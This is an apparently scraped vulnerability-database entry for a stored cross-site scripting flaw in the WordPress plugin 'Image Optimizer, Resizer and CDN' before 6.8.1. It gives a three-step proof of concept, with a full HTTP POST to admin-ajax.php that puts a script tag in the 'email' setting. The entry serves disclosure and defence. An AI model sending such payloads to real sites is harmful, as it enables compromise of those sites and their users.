Lucene search

K
wpexploitIohexWPEX-ID:11040133-C134-4F96-8421-EDD04901ED0D
HistoryDec 09, 2022 - 12:00 a.m.

Image Optimizer, Resizer and CDN < 6.8.1 - Admin+ Stored XSS

2022-12-0900:00:00
iohex
181
image optimization
resizing
content delivery network
stored xss
security exploit
admin+

EPSS

0.001

Percentile

25.3%

The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

Step 1: Install the plugin and register for an account.
 
Step 2: Send an ajax request as shown:
 
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wpscan.local
Content-Length: 83
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://wpscan.local
Referer: http://wpscan.local/wp-admin/admin.php?page=sirv%2Fsirv%2Fshortcodes-view.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [admin+]
Connection: close

action=sirv_setup_credentials&email=<script>alert(/XSS/);</script>&sirv_account=aaa
 
Step 3: Refresh the account page to get the XSS popup.

EPSS

0.001

Percentile

25.3%

Related for WPEX-ID:11040133-C134-4F96-8421-EDD04901ED0D